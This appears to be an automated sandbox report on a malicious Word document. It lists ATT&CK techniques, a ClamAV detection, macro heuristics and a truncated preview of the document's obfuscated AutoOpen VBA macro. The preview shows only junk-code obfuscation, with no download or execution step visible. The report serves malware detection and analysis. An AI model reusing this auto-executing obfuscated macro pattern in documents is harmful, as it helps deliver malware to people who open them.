MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of a legacy WordBasic AutoOpen macro and significant VBA macro content indicates a malicious document. The obfuscated VBA code within the AutoOpen subroutine is designed to execute, likely downloading and running a second-stage payload. The ClamAV detection 'Doc.Malware.Sagent-6697295-0' further supports its malicious nature. No specific IOCs like URLs or file paths were directly extractable from the obfuscated script.
Heuristics 5
-
ClamAV: Doc.Malware.Sagent-6697295-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44832 bytes |
SHA-256: 61f4ba7f03ef84b1de76a01e9d712507de18793849fc05d145d4b350ce556d8c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const sAyHqoiOkODOKbaZiWEruNUTOJ = 0 Sub AutoOpen() On Error Resume Next Dim loNoWQuggyWENcUymELaRAq(4) If 10 = 10 + (3 * 0) Then loNoWQuggyWENcUymELaRAq(0) = CLng(3353) End If loNoWQuggyWENcUymELaRAq(1) = Sqr(3) loNoWQuggyWENcUymELaRAq(2) = Month(33533353) loNoWQuggyWENcUymELaRAq(3) = Fix(3353.3) Dim hAWofIZEXiWbaoJamypyGamAhITutUMu(4) If 10 = 10 + (6 * 0) Then hAWofIZEXiWbaoJamypyGamAhITutUMu(0) = CLng(5730) End If hAWofIZEXiWbaoJamypyGamAhITutUMu(1) = Sqr(6) hAWofIZEXiWbaoJamypyGamAhITutUMu(2) = Month(57305730) hAWofIZEXiWbaoJamypyGamAhITutUMu(3) = Fix(5730.6) Dim VYDAcAkepEUqSoBUTEwFyQasY(4) If 13 = 13 + (2 * 0) Then VYDAcAkepEUqSoBUTEwFyQasY(0) = CLng(5701) Dim JuQOSAPoCYCObheVxokUGAqECyxAMIZor(4) If 10 = 10 + (9 * 0) Then JuQOSAPoCYCObheVxokUGAqECyxAMIZor(0) = CLng(2792) End If JuQOSAPoCYCObheVxokUGAqECyxAMIZor(1) = Sqr(9) JuQOSAPoCYCObheVxokUGAqECyxAMIZor(2) = Month(27922792) JuQOSAPoCYCObheVxokUGAqECyxAMIZor(3) = Fix(2792.9) End If Dim lykYcAfNIssAheiOnEVIbUSyMoLA(4) If 10 = 10 + (8 * 0) Then lykYcAfNIssAheiOnEVIbUSyMoLA(0) = CLng(3602) End If lykYcAfNIssAheiOnEVIbUSyMoLA(1) = Sqr(8) lykYcAfNIssAheiOnEVIbUSyMoLA(2) = Month(36023602) lykYcAfNIssAheiOnEVIbUSyMoLA(3) = Fix(3602.8) Dim KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(4) If 12 = 12 + (5 * 0) Then KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(0) = CLng(7599) End If KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(1) = Sqr(5) KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(2) = Month(75997599) KoqURacNYRAaUnIbusAxiwjiXaLUxEQyqEgyB(3) = Fix(7599.5) VYDAcAkepEUqSoBUTEwFyQasY(1) = Sqr(2) Dim DAdumaBaCinEHuRnygiSEKasOlAsAk(4) If 12 = 12 + (8 * 0) Then DAdumaBaCinEHuRnygiSEKasOlAsAk(0) = CLng(5306) End If DAdumaBaCinEHuRnygiSEKasOlAsAk(1) = Sqr(8) DAdumaBaCinEHuRnygiSEKasOlAsAk(2) = Month(53065306) DAdumaBaCinEHuRnygiSEKasOlAsAk(3) = Fix(5306.8) Dim xxYboBaaAlqYdovGuFogAQapAxOia(4) If 11 = 11 + (2 * 0) Then xxYboBaaAlqYdovGuFogAQapAxOia(0) = CLng(4014) End If xxYboBaaAlqYdovGuFogAQapAxOia(1) = Sqr(2) xxYboBaaAlqYdovGuFogAQapAxOia(2) = Month(40144014) xxYboBaaAlqYdovGuFogAQapAxOia(3) = Fix(4014.2) VYDAcAkepEUqSoBUTEwFyQasY(2) = Month(57015701) VYDAcAkepEUqSoBUTEwFyQasY(3) = Fix(5701.2) Dim DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(4) If 13 = 13 + (2 * 0) Then DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(0) = CLng(4766) End If DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(1) = Sqr(2) DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(2) = Month(47664766) DIadUpoZAPcedobAwoNUbuGEjUkAcUGEDulAkYmI(3) = Fix(4766.2) Dim MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(4) If 12 = 12 + (9 * 0) Then MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(0) = CLng(5820) End If MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(1) = Sqr(9) MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(2) = Month(58205820) MYhaBonoXAQYwUTadyawenNogAJejoIrOZiLIb(3) = Fix(5820.9) Dim LACEVeLOTERykISeopUrBoDEfGUFihEwenMaBa(4) Dim TSEnaPOSipWIXUgymusudyfORikAJ(4) If 12 = 12 + (10 * 0) Then TSEnaPOSipWIXUgymusudyfORikAJ(0) = CLng(8050) End If TSEnaPOSipWIXUgymusudyfORikAJ(1) = Sqr(10) TSEnaPOSipWIXUgymusudyfORikAJ(2) = Month(80508050) TSEnaPOSipWIXUgymusudyfORikAJ(3) = Fix(8050.1) If 11 = 11 + (2 * 0) Then LACEVeLOTERykISeopUrBoDEfGUFihEwenMaBa(0) = CLng(2221) Dim lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(4) If 13 = 13 + (2 * 0) Then lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(0) = CLng(5332) End If lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(1) = Sqr(2) lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(2) = Month(53325332) lygEnOGuPAsePYVyjyOXojeQsopGqhYaAyiyTIDa(3) = Fix(5332.2) Dim dOHolEVolaprEgUXEVOioBIgySIRUjOqax(4) If 13 = 13 + (5 * 0) Then dOHolEVolaprEgUXEVOioBIgySIRUjOqax(0) = CLng(4803) End If dOHolEVolaprEgUXEVOioBIgySIRUjOqax(1) = Sqr(5) dOHolEVolaprEgUXEVOioBIgySIRUjOqax(2) = Month(48034803) dOHo ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.